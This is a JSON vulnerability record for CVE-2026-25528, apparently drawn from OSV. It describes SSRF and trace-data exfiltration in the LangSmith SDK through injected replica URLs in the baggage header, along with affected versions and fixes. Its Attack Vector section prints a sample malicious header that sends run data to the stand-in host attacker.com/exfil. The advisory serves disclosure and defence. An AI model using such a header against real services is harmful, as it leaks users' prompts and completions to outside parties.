{"id":"CVE-2026-25528","aliases":["GHSA-v34v-rq6j-cj6p","PYSEC-2026-2584"],"title":"LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection","summary":"LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection","severity":"medium","cvss":5.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","vendor":"langsmith","product":"langsmith","ecosystem":"pip","affected":["langsmith >= 0.4.10, < 0.6.3","langsmith >= 0.3.41, < 0.4.6"],"patched":["langsmith 0.6.3","langsmith 0.4.6"],"published":"2026-02-09","updated":"2026-09-10","sourceUpdated":"2026-09-10T03:50:35.941728103Z","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-v34v-rq6j-cj6p","references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25528"},{"url":"https://github.com/langchain-ai/langsmith-sdk"}],"tags":["osv","pip"],"epss":0.00293,"epssPercentile":0.22136,"ingestedAt":"2026-07-13T18:58:03.088Z","slug":"CVE-2026-25528","body":"## Overview\n\n## Summary\n\nThe LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.\n\n---\n\n## Description\n\nWhen using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in Typescript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.\n\nPrior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.\n\n---\n\n## Attack Vector\n\n1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:\n   ```\n   baggage: langsmith-replicas=[{\"api_url\":\"https://attacker.com/exfil\",\"project_name\":\"x\"}]\n   ```\n\n2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL\n\n3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`\n\n---\n\n## Impact\n\n- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers\n- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services\n\n---\n\n## Affected Use Cases\n\nApplications are vulnerable if they:\n- Use `TracingMiddleware` to automatically propagate tracing context\n- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers\n\n---\n\n## Remediation\n\nUpdate to the patched versions:\n- **Python:** `pip install langsmith>=0.6.3`\n- **JavaScript:** `npm install langsmith@>=0.4.6`\n\nThe fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.\n\n---\n\n## Workarounds\n\nIf unable to upgrade immediately:\n- Strip or validate the `baggage` header before passing to `from_headers()`\n- Do not use `TracingMiddleware` with untrusted traffic\n\n## Affected packages\n\n- `langsmith >= 0.4.10, < 0.6.3`\n- `langsmith >= 0.3.41, < 0.4.6`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `langsmith 0.6.3`\n- `langsmith 0.4.6`","depth":"sunlit","depthScore":32,"depthScoreParts":{"impact":31.9,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}